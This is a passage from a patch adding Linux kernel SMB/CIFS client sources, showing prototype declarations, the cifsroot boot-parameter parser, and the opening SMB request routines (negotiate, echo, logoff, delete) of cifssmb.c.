++bool is_server_using_iface(struct TCP_Server_Info *server,
++			   struct cifs_server_iface *iface);
++bool is_ses_using_iface(struct cifs_ses *ses, struct cifs_server_iface *iface);
++void cifs_ses_mark_for_reconnect(struct cifs_ses *ses);
++
++unsigned int
++cifs_ses_get_chan_index(struct cifs_ses *ses,
++			struct TCP_Server_Info *server);
++void
++cifs_chan_set_in_reconnect(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server);
++void
++cifs_chan_clear_in_reconnect(struct cifs_ses *ses,
++			       struct TCP_Server_Info *server);
++bool
++cifs_chan_in_reconnect(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server);
++void
++cifs_chan_set_need_reconnect(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server);
++void
++cifs_chan_clear_need_reconnect(struct cifs_ses *ses,
++			       struct TCP_Server_Info *server);
++bool
++cifs_chan_needs_reconnect(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server);
++bool
++cifs_chan_is_iface_active(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server);
++int
++cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server);
++int
++SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_mount);
++
++void extract_unc_hostname(const char *unc, const char **h, size_t *len);
++int copy_path_name(char *dst, const char *src);
++int smb2_parse_query_directory(struct cifs_tcon *tcon, struct kvec *rsp_iov,
++			       int resp_buftype,
++			       struct cifs_search_info *srch_inf);
++
++struct super_block *cifs_get_tcp_super(struct TCP_Server_Info *server);
++void cifs_put_tcp_super(struct super_block *sb);
++int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix);
++char *extract_hostname(const char *unc);
++char *extract_sharename(const char *unc);
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++static inline int get_dfs_path(const unsigned int xid, struct cifs_ses *ses,
++			       const char *old_path,
++			       const struct nls_table *nls_codepage,
++			       struct dfs_info3_param *referral, int remap)
++{
++	return dfs_cache_find(xid, ses, nls_codepage, remap, old_path,
++			      referral, NULL);
++}
++
++int match_target_ip(struct TCP_Server_Info *server,
++		    const char *share, size_t share_len,
++		    bool *result);
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink);
++#else
++static inline int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	*islink = false;
++	return 0;
++}
++#endif
++
++static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
++{
++	if (cifs_sb && (backup_cred(cifs_sb)))
++		return options | CREATE_OPEN_BACKUP_INTENT;
++	else
++		return options;
++}
++
++struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
++void cifs_put_tcon_super(struct super_block *sb);
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
++
++#endif			/* _CIFSPROTO_H */
+diff --git a/fs/smb/client/cifsroot.c b/fs/smb/client/cifsroot.c
+new file mode 100644
+index 0000000000000..56ec1b233f52e
+--- /dev/null
++++ b/fs/smb/client/cifsroot.c
+@@ -0,0 +1,94 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * SMB root file system support
++ *
++ * Copyright (c) 2019 Paulo Alcantara <palcantara@suse.de>
++ */
++#include <linux/init.h>
++#include <linux/fs.h>
++#include <linux/types.h>
++#include <linux/ctype.h>
++#include <linux/string.h>
++#include <linux/root_dev.h>
++#include <linux/kernel.h>
++#include <linux/in.h>
++#include <linux/inet.h>
++#include <net/ipconfig.h>
++
++#define DEFAULT_MNT_OPTS \
++	"vers=1.0,cifsacl,mfsymlinks,rsize=1048576,wsize=65536,uid=0,gid=0," \
++	"hard,rootfs"
++
++static char root_dev[2048] __initdata = "";
++static char root_opts[1024] __initdata = DEFAULT_MNT_OPTS;
++
++static __be32 __init parse_srvaddr(char *start, char *end)
++{
++	/* TODO: ipv6 support */
++	char addr[sizeof("aaa.bbb.ccc.ddd")];
++	int i = 0;
++
++	while (start < end && i < sizeof(addr) - 1) {
++		if (isdigit(*start) || *start == '.')
++			addr[i++] = *start;
++		start++;
++	}
++	addr[i] = '\0';
++	return in_aton(addr);
++}
++
++/* cifsroot=//<server-ip>/<share>[,options] */
++static int __init cifs_root_setup(char *line)
++{
++	char *s;
++	int len;
++	__be32 srvaddr = htonl(INADDR_NONE);
++
++	ROOT_DEV = Root_CIFS;
++
++	if (strlen(line) > 3 && line[0] == '/' && line[1] == '/') {
++		s = strchr(&line[2], '/');
++		if (!s || s[1] == '\0')
++			return 1;
++
++		/* make s point to ',' or '\0' at end of line */
++		s = strchrnul(s, ',');
++		/* len is strlen(unc) + '\0' */
++		len = s - line + 1;
++		if (len > sizeof(root_dev)) {
++			pr_err("Root-CIFS: UNC path too long\n");
++			return 1;
++		}
++		strscpy(root_dev, line, len);
++		srvaddr = parse_srvaddr(&line[2], s);
++		if (*s) {
++			int n = snprintf(root_opts,
++					 sizeof(root_opts), "%s,%s",
++					 DEFAULT_MNT_OPTS, s + 1);
++			if (n >= sizeof(root_opts)) {
++				pr_err("Root-CIFS: mount options string too long\n");
++				root_opts[sizeof(root_opts)-1] = '\0';
++				return 1;
++			}
++		}
++	}
++
++	root_server_addr = srvaddr;
++
++	return 1;
++}
++
++__setup("cifsroot=", cifs_root_setup);
++
++int __init cifs_root_data(char **dev, char **opts)
++{
++	if (!root_dev[0] || root_server_addr == htonl(INADDR_NONE)) {
++		pr_err("Root-CIFS: no SMB server address\n");
++		return -1;
++	}
++
++	*dev = root_dev;
++	*opts = root_opts;
++
++	return 0;
++}
+diff --git a/fs/smb/client/cifssmb.c b/fs/smb/client/cifssmb.c
+new file mode 100644
+index 0000000000000..c90d4ec9292ca
+--- /dev/null
++++ b/fs/smb/client/cifssmb.c
+@@ -0,0 +1,5873 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2010
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   Contains the routines for constructing the SMB PDUs themselves
++ *
++ */
++
++ /* SMB/CIFS PDU handling routines here - except for leftovers in connect.c   */
++ /* These are mostly routines that operate on a pathname, or on a tree id     */
++ /* (mounted volume), but there are eight handle based routines which must be */
++ /* treated slightly differently for reconnection purposes since we never     */
++ /* want to reuse a stale file handle and only the caller knows the file info */
++
++#include <linux/fs.h>
++#include <linux/kernel.h>
++#include <linux/vfs.h>
++#include <linux/slab.h>
++#include <linux/posix_acl_xattr.h>
++#include <linux/pagemap.h>
++#include <linux/swap.h>
++#include <linux/task_io_accounting_ops.h>
++#include <linux/uaccess.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsacl.h"
++#include "cifsproto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "fscache.h"
++#include "smbdirect.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++
++#ifdef CONFIG_CIFS_POSIX
++static struct {
++	int index;
++	char *name;
++} protocols[] = {
++	{CIFS_PROT, "\2NT LM 0.12"},
++	{POSIX_PROT, "\2POSIX 2"},
++	{BAD_PROT, "\2"}
++};
++#else
++static struct {
++	int index;
++	char *name;
++} protocols[] = {
++	{CIFS_PROT, "\2NT LM 0.12"},
++	{BAD_PROT, "\2"}
++};
++#endif
++
++/* define the number of elements in the cifs dialect array */
++#ifdef CONFIG_CIFS_POSIX
++#define CIFS_NUM_PROT 2
++#else /* not posix */
++#define CIFS_NUM_PROT 1
++#endif /* CIFS_POSIX */
++
++
++/* reconnect the socket, tcon, and smb session if needed */
++static int
++cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
++{
++	int rc;
++	struct cifs_ses *ses;
++	struct TCP_Server_Info *server;
++	struct nls_table *nls_codepage;
++
++	/*
++	 * SMBs NegProt, SessSetup, uLogoff do not have tcon yet so check for
++	 * tcp and smb session status done differently for those three - in the
++	 * calling routine
++	 */
++	if (!tcon)
++		return 0;
++
++	ses = tcon->ses;
++	server = ses->server;
++
++	/*
++	 * only tree disconnect, open, and write, (and ulogoff which does not
++	 * have tcon) are allowed as we start umount
++	 */
++	spin_lock(&tcon->tc_lock);
++	if (tcon->status == TID_EXITING) {
++		if (smb_command != SMB_COM_TREE_DISCONNECT) {
++			spin_unlock(&tcon->tc_lock);
++			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
++				 smb_command);
++			return -ENODEV;
++		}
++	}
++	spin_unlock(&tcon->tc_lock);
++
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
++	if (rc)
++		return rc;
++
++	spin_lock(&ses->chan_lock);
++	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
++		spin_unlock(&ses->chan_lock);
++		return 0;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	nls_codepage = load_nls_default();
++
++	/*
++	 * Recheck after acquire mutex. If another thread is negotiating
++	 * and the server never sends an answer the socket will be closed
++	 * and tcpStatus set to reconnect.
++	 */
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		rc = -EHOSTDOWN;
++		goto out;
++	}
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * need to prevent multiple threads trying to simultaneously
++	 * reconnect the same SMB session
++	 */
++	spin_lock(&ses->chan_lock);
++	if (!cifs_chan_needs_reconnect(ses, server)) {
++		spin_unlock(&ses->chan_lock);
++
++		/* this means that we only need to tree connect */
++		if (tcon->need_reconnect)
++			goto skip_sess_setup;
++
++		rc = -EHOSTDOWN;
++		goto out;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	mutex_lock(&ses->session_mutex);
++	rc = cifs_negotiate_protocol(0, ses, server);
++	if (!rc)
++		rc = cifs_setup_session(0, ses, server, nls_codepage);
++
++	/* do we need to reconnect tcon? */
++	if (rc || !tcon->need_reconnect) {
++		mutex_unlock(&ses->session_mutex);
++		goto out;
++	}
++
++skip_sess_setup:
++	cifs_mark_open_files_invalid(tcon);
++	rc = cifs_tree_connect(0, tcon, nls_codepage);
++	mutex_unlock(&ses->session_mutex);
++	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
++
++	if (rc) {
++		pr_warn_once("reconnect tcon failed rc = %d\n", rc);
++		goto out;
++	}
++
++	atomic_inc(&tconInfoReconnectCount);
++
++	/* tell server Unix caps we support */
++	if (cap_unix(ses))
++		reset_cifs_unix_caps(0, tcon, NULL, NULL);
++
++	/*
++	 * Removed call to reopen open files here. It is safer (and faster) to
++	 * reopen files one at a time as needed in read and write.
++	 *
++	 * FIXME: what about file locks? don't we need to reclaim them ASAP?
++	 */
++
++out:
++	/*
++	 * Check if handle based operation so we know whether we can continue
++	 * or not without returning to caller to reset file handle
++	 */
++	switch (smb_command) {
++	case SMB_COM_READ_ANDX:
++	case SMB_COM_WRITE_ANDX:
++	case SMB_COM_CLOSE:
++	case SMB_COM_FIND_CLOSE2:
++	case SMB_COM_LOCKING_ANDX:
++		rc = -EAGAIN;
++	}
++
++	unload_nls(nls_codepage);
++	return rc;
++}
++
++/* Allocate and return pointer to an SMB request buffer, and set basic
++   SMB information in the SMB header.  If the return code is zero, this
++   function must have filled in request_buf pointer */
++static int
++small_smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
++		void **request_buf)
++{
++	int rc;
++
++	rc = cifs_reconnect_tcon(tcon, smb_command);
++	if (rc)
++		return rc;
++
++	*request_buf = cifs_small_buf_get();
++	if (*request_buf == NULL) {
++		/* BB should we add a retry in here if not a writepage? */
++		return -ENOMEM;
++	}
++
++	header_assemble((struct smb_hdr *) *request_buf, smb_command,
++			tcon, wct);
++
++	if (tcon != NULL)
++		cifs_stats_inc(&tcon->num_smbs_sent);
++
++	return 0;
++}
++
++int
++small_smb_init_no_tc(const int smb_command, const int wct,
++		     struct cifs_ses *ses, void **request_buf)
++{
++	int rc;
++	struct smb_hdr *buffer;
++
++	rc = small_smb_init(smb_command, wct, NULL, request_buf);
++	if (rc)
++		return rc;
++
++	buffer = (struct smb_hdr *)*request_buf;
++	buffer->Mid = get_next_mid(ses->server);
++	if (ses->capabilities & CAP_UNICODE)
++		buffer->Flags2 |= SMBFLG2_UNICODE;
++	if (ses->capabilities & CAP_STATUS32)
++		buffer->Flags2 |= SMBFLG2_ERR_STATUS;
++
++	/* uid, tid can stay at zero as set in header assemble */
++
++	/* BB add support for turning on the signing when
++	this function is used after 1st of session setup requests */
++
++	return rc;
++}
++
++/* If the return code is zero, this function must fill in request_buf pointer */
++static int
++__smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
++			void **request_buf, void **response_buf)
++{
++	*request_buf = cifs_buf_get();
++	if (*request_buf == NULL) {
++		/* BB should we add a retry in here if not a writepage? */
++		return -ENOMEM;
++	}
++    /* Although the original thought was we needed the response buf for  */
++    /* potential retries of smb operations it turns out we can determine */
++    /* from the mid flags when the request buffer can be resent without  */
++    /* having to use a second distinct buffer for the response */
++	if (response_buf)
++		*response_buf = *request_buf;
++
++	header_assemble((struct smb_hdr *) *request_buf, smb_command, tcon,
++			wct);
++
++	if (tcon != NULL)
++		cifs_stats_inc(&tcon->num_smbs_sent);
++
++	return 0;
++}
++
++/* If the return code is zero, this function must fill in request_buf pointer */
++static int
++smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
++	 void **request_buf, void **response_buf)
++{
++	int rc;
++
++	rc = cifs_reconnect_tcon(tcon, smb_command);
++	if (rc)
++		return rc;
++
++	return __smb_init(smb_command, wct, tcon, request_buf, response_buf);
++}
++
++static int
++smb_init_no_reconnect(int smb_command, int wct, struct cifs_tcon *tcon,
++			void **request_buf, void **response_buf)
++{
++	spin_lock(&tcon->ses->chan_lock);
++	if (cifs_chan_needs_reconnect(tcon->ses, tcon->ses->server) ||
++	    tcon->need_reconnect) {
++		spin_unlock(&tcon->ses->chan_lock);
++		return -EHOSTDOWN;
++	}
++	spin_unlock(&tcon->ses->chan_lock);
++
++	return __smb_init(smb_command, wct, tcon, request_buf, response_buf);
++}
++
++static int validate_t2(struct smb_t2_rsp *pSMB)
++{
++	unsigned int total_size;
++
++	/* check for plausible wct */
++	if (pSMB->hdr.WordCount < 10)
++		goto vt2_err;
++
++	/* check for parm and data offset going beyond end of smb */
++	if (get_unaligned_le16(&pSMB->t2_rsp.ParameterOffset) > 1024 ||
++	    get_unaligned_le16(&pSMB->t2_rsp.DataOffset) > 1024)
++		goto vt2_err;
++
++	total_size = get_unaligned_le16(&pSMB->t2_rsp.ParameterCount);
++	if (total_size >= 512)
++		goto vt2_err;
++
++	/* check that bcc is at least as big as parms + data, and that it is
++	 * less than negotiated smb buffer
++	 */
++	total_size += get_unaligned_le16(&pSMB->t2_rsp.DataCount);
++	if (total_size > get_bcc(&pSMB->hdr) ||
++	    total_size >= CIFSMaxBufSize + MAX_CIFS_HDR_SIZE)
++		goto vt2_err;
++
++	return 0;
++vt2_err:
++	cifs_dump_mem("Invalid transact2 SMB: ", (char *)pSMB,
++		sizeof(struct smb_t2_rsp) + 16);
++	return -EINVAL;
++}
++
++static int
++decode_ext_sec_blob(struct cifs_ses *ses, NEGOTIATE_RSP *pSMBr)
++{
++	int	rc = 0;
++	u16	count;
++	char	*guid = pSMBr->u.extended_response.GUID;
++	struct TCP_Server_Info *server = ses->server;
++
++	count = get_bcc(&pSMBr->hdr);
++	if (count < SMB1_CLIENT_GUID_SIZE)
++		return -EIO;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	if (server->srv_count > 1) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		if (memcmp(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE) != 0) {
++			cifs_dbg(FYI, "server UID changed\n");
++			memcpy(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE);
++		}
++	} else {
++		spin_unlock(&cifs_tcp_ses_lock);
++		memcpy(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE);
++	}
++
++	if (count == SMB1_CLIENT_GUID_SIZE) {
++		server->sec_ntlmssp = true;
++	} else {
++		count -= SMB1_CLIENT_GUID_SIZE;
++		rc = decode_negTokenInit(
++			pSMBr->u.extended_response.SecurityBlob, count, server);
++		if (rc != 1)
++			return -EINVAL;
++	}
++
++	return 0;
++}
++
++static bool
++should_set_ext_sec_flag(enum securityEnum sectype)
++{
++	switch (sectype) {
++	case RawNTLMSSP:
++	case Kerberos:
++		return true;
++	case Unspecified:
++		if (global_secflags &
++		    (CIFSSEC_MAY_KRB5 | CIFSSEC_MAY_NTLMSSP))
++			return true;
++		fallthrough;
++	default:
++		return false;
++	}
++}
++
++int
++CIFSSMBNegotiate(const unsigned int xid,
++		 struct cifs_ses *ses,
++		 struct TCP_Server_Info *server)
++{
++	NEGOTIATE_REQ *pSMB;
++	NEGOTIATE_RSP *pSMBr;
++	int rc = 0;
++	int bytes_returned;
++	int i;
++	u16 count;
++
++	if (!server) {
++		WARN(1, "%s: server is NULL!\n", __func__);
++		return -EIO;
++	}
++
++	rc = smb_init(SMB_COM_NEGOTIATE, 0, NULL /* no tcon yet */ ,
++		      (void **) &pSMB, (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Mid = get_next_mid(server);
++	pSMB->hdr.Flags2 |= (SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS);
++
++	if (should_set_ext_sec_flag(ses->sectype)) {
++		cifs_dbg(FYI, "Requesting extended security\n");
++		pSMB->hdr.Flags2 |= SMBFLG2_EXT_SEC;
++	}
++
++	count = 0;
++	/*
++	 * We know that all the name entries in the protocols array
++	 * are short (< 16 bytes anyway) and are NUL terminated.
++	 */
++	for (i = 0; i < CIFS_NUM_PROT; i++) {
++		size_t len = strlen(protocols[i].name) + 1;
++
++		memcpy(&pSMB->DialectsArray[count], protocols[i].name, len);
++		count += len;
++	}
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	rc = SendReceive(xid, ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc != 0)
++		goto neg_err_exit;
++
++	server->dialect = le16_to_cpu(pSMBr->DialectIndex);
++	cifs_dbg(FYI, "Dialect: %d\n", server->dialect);
++	/* Check wct = 1 error case */
++	if ((pSMBr->hdr.WordCount <= 13) || (server->dialect == BAD_PROT)) {
++		/* core returns wct = 1, but we do not ask for core - otherwise
++		small wct just comes when dialect index is -1 indicating we
++		could not negotiate a common dialect */
++		rc = -EOPNOTSUPP;
++		goto neg_err_exit;
++	} else if (pSMBr->hdr.WordCount != 17) {
++		/* unknown wct */
++		rc = -EOPNOTSUPP;
++		goto neg_err_exit;
++	}
++	/* else wct == 17, NTLM or better */
++
++	server->sec_mode = pSMBr->SecurityMode;
++	if ((server->sec_mode & SECMODE_USER) == 0)
++		cifs_dbg(FYI, "share mode security\n");
++
++	/* one byte, so no need to convert this or EncryptionKeyLen from
++	   little endian */
++	server->maxReq = min_t(unsigned int, le16_to_cpu(pSMBr->MaxMpxCount),
++			       cifs_max_pending);
++	set_credits(server, server->maxReq);
++	/* probably no need to store and check maxvcs */
++	server->maxBuf = le32_to_cpu(pSMBr->MaxBufferSize);
++	/* set up max_read for readahead check */
++	server->max_read = server->maxBuf;
++	server->max_rw = le32_to_cpu(pSMBr->MaxRawSize);
++	cifs_dbg(NOISY, "Max buf = %d\n", ses->server->maxBuf);
++	server->capabilities = le32_to_cpu(pSMBr->Capabilities);
++	server->timeAdj = (int)(__s16)le16_to_cpu(pSMBr->ServerTimeZone);
++	server->timeAdj *= 60;
++
++	if (pSMBr->EncryptionKeyLength == CIFS_CRYPTO_KEY_SIZE) {
++		server->negflavor = CIFS_NEGFLAVOR_UNENCAP;
++		memcpy(ses->server->cryptkey, pSMBr->u.EncryptionKey,
++		       CIFS_CRYPTO_KEY_SIZE);
++	} else if (pSMBr->hdr.Flags2 & SMBFLG2_EXT_SEC ||
++			server->capabilities & CAP_EXTENDED_SECURITY) {
++		server->negflavor = CIFS_NEGFLAVOR_EXTENDED;
++		rc = decode_ext_sec_blob(ses, pSMBr);
++	} else if (server->sec_mode & SECMODE_PW_ENCRYPT) {
++		rc = -EIO; /* no crypt key only if plain text pwd */
++	} else {
++		server->negflavor = CIFS_NEGFLAVOR_UNENCAP;
++		server->capabilities &= ~CAP_EXTENDED_SECURITY;
++	}
++
++	if (!rc)
++		rc = cifs_enable_signing(server, ses->sign);
++neg_err_exit:
++	cifs_buf_release(pSMB);
++
++	cifs_dbg(FYI, "negprot rc %d\n", rc);
++	return rc;
++}
++
++int
++CIFSSMBTDis(const unsigned int xid, struct cifs_tcon *tcon)
++{
++	struct smb_hdr *smb_buffer;
++	int rc = 0;
++
++	cifs_dbg(FYI, "In tree disconnect\n");
++
++	/* BB: do we need to check this? These should never be NULL. */
++	if ((tcon->ses == NULL) || (tcon->ses->server == NULL))
++		return -EIO;
++
++	/*
++	 * No need to return error on this operation if tid invalidated and
++	 * closed on server already e.g. due to tcp session crashing. Also,
++	 * the tcon is no longer on the list, so no need to take lock before
++	 * checking this.
++	 */
++	spin_lock(&tcon->ses->chan_lock);
++	if ((tcon->need_reconnect) || CIFS_ALL_CHANS_NEED_RECONNECT(tcon->ses)) {
++		spin_unlock(&tcon->ses->chan_lock);
++		return -EIO;
++	}
++	spin_unlock(&tcon->ses->chan_lock);
++
++	rc = small_smb_init(SMB_COM_TREE_DISCONNECT, 0, tcon,
++			    (void **)&smb_buffer);
++	if (rc)
++		return rc;
++
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *)smb_buffer, 0);
++	cifs_small_buf_release(smb_buffer);
++	if (rc)
++		cifs_dbg(FYI, "Tree disconnect failed %d\n", rc);
++
++	/* No need to return error on this operation if tid invalidated and
++	   closed on server already e.g. due to tcp session crashing */
++	if (rc == -EAGAIN)
++		rc = 0;
++
++	return rc;
++}
++
++/*
++ * This is a no-op for now. We're not really interested in the reply, but
++ * rather in the fact that the server sent one and that server->lstrp
++ * gets updated.
++ *
++ * FIXME: maybe we should consider checking that the reply matches request?
++ */
++static void
++cifs_echo_callback(struct mid_q_entry *mid)
++{
++	struct TCP_Server_Info *server = mid->callback_data;
++	struct cifs_credits credits = { .value = 1, .instance = 0 };
++
++	release_mid(mid);
++	add_credits(server, &credits, CIFS_ECHO_OP);
++}
++
++int
++CIFSSMBEcho(struct TCP_Server_Info *server)
++{
++	ECHO_REQ *smb;
++	int rc = 0;
++	struct kvec iov[2];
++	struct smb_rqst rqst = { .rq_iov = iov,
++				 .rq_nvec = 2 };
++
++	cifs_dbg(FYI, "In echo request\n");
++
++	rc = small_smb_init(SMB_COM_ECHO, 0, NULL, (void **)&smb);
++	if (rc)
++		return rc;
++
++	if (server->capabilities & CAP_UNICODE)
++		smb->hdr.Flags2 |= SMBFLG2_UNICODE;
++
++	/* set up echo request */
++	smb->hdr.Tid = 0xffff;
++	smb->hdr.WordCount = 1;
++	put_unaligned_le16(1, &smb->EchoCount);
++	put_bcc(1, &smb->hdr);
++	smb->Data[0] = 'a';
++	inc_rfc1001_len(smb, 3);
++
++	iov[0].iov_len = 4;
++	iov[0].iov_base = smb;
++	iov[1].iov_len = get_rfc1002_length(smb);
++	iov[1].iov_base = (char *)smb + 4;
++
++	rc = cifs_call_async(server, &rqst, NULL, cifs_echo_callback, NULL,
++			     server, CIFS_NON_BLOCKING | CIFS_ECHO_OP, NULL);
++	if (rc)
++		cifs_dbg(FYI, "Echo request failed: %d\n", rc);
++
++	cifs_small_buf_release(smb);
++
++	return rc;
++}
++
++int
++CIFSSMBLogoff(const unsigned int xid, struct cifs_ses *ses)
++{
++	LOGOFF_ANDX_REQ *pSMB;
++	int rc = 0;
++
++	cifs_dbg(FYI, "In SMBLogoff for session disconnect\n");
++
++	/*
++	 * BB: do we need to check validity of ses and server? They should
++	 * always be valid since we have an active reference. If not, that
++	 * should probably be a BUG()
++	 */
++	if (!ses || !ses->server)
++		return -EIO;
++
++	mutex_lock(&ses->session_mutex);
++	spin_lock(&ses->chan_lock);
++	if (CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++		spin_unlock(&ses->chan_lock);
++		goto session_already_dead; /* no need to send SMBlogoff if uid
++					      already closed due to reconnect */
++	}
++	spin_unlock(&ses->chan_lock);
++
++	rc = small_smb_init(SMB_COM_LOGOFF_ANDX, 2, NULL, (void **)&pSMB);
++	if (rc) {
++		mutex_unlock(&ses->session_mutex);
++		return rc;
++	}
++
++	pSMB->hdr.Mid = get_next_mid(ses->server);
++
++	if (ses->server->sign)
++		pSMB->hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++
++	pSMB->hdr.Uid = ses->Suid;
++
++	pSMB->AndXCommand = 0xFF;
++	rc = SendReceiveNoRsp(xid, ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++session_already_dead:
++	mutex_unlock(&ses->session_mutex);
++
++	/* if session dead then we do not need to do ulogoff,
++		since server closed smb session, no sense reporting
++		error */
++	if (rc == -EAGAIN)
++		rc = 0;
++	return rc;
++}
++
++int
++CIFSPOSIXDelFile(const unsigned int xid, struct cifs_tcon *tcon,
++		 const char *fileName, __u16 type,
++		 const struct nls_table *nls_codepage, int remap)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	struct unlink_psx_rq *pRqD;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, offset, byte_count;
++
++	cifs_dbg(FYI, "In POSIX delete\n");
++PsxDelete:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, fileName);
++	}
++
++	params = 6 + name_len;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = 0; /* BB double check this with jra */
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++
++	/* Setup pointer to Request Data (inode type).
++	 * Note that SMB offsets are from the beginning of SMB which is 4 bytes
++	 * in, after RFC1001 field
++	 */
++	pRqD = (struct unlink_psx_rq *)((char *)(pSMB) + offset + 4);
++	pRqD->type = cpu_to_le16(type);
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + sizeof(struct unlink_psx_rq);
++
++	pSMB->DataCount = cpu_to_le16(sizeof(struct unlink_psx_rq));
++	pSMB->TotalDataCount = cpu_to_le16(sizeof(struct unlink_psx_rq));
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_POSIX_UNLINK);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "Posix delete returned %d\n", rc);
++	cifs_buf_release(pSMB);
++
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_deletes);
++
++	if (rc == -EAGAIN)
++		goto PsxDelete;
++
++	return rc;
++}
++
++int
++CIFSSMBDelFile(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
++	       struct cifs_sb_info *cifs_sb)
++{
++	DELETE_FILE_REQ *pSMB = NULL;
++	DELETE_FILE_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	int remap = cifs_remap(cifs_sb);
++
++DelFileRetry:
++	rc = smb_init(SMB_COM_DELETE, 1, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->fileName, name,
++					      PATH_MAX, cifs_sb->local_nls,
++					      remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->fileName, name);
++	}
++	pSMB->SearchAttributes =
++	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM);
++	pSMB->BufferFormat = 0x04;
++	inc_rfc1001_len(pSMB, name_len + 1);
++	pSMB->ByteCount = cpu_to_le16(name_len + 1);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_deletes);
++	if (rc)
++		cifs_dbg(FYI, "Error in RMFile = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto DelFileRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBRmDir(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
